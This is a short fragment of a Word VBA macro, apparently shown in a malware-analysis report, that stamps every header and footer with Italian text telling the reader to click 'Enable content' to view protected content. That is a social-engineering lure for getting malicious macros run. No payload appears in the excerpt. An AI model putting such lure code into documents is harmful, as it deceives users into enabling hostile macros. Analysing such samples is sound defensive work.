        .Headers(wdHeaderFooterPrimary).Range.Text = "Contenuto protetto fare clic su 'Abilita contenuto' per visualizzare"
        .Footers(wdHeaderFooterPrimary).Range.Text = "Contenuto protetto fare clic su 'Abilita contenuto' per visualizzare"
    End With
Next

End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.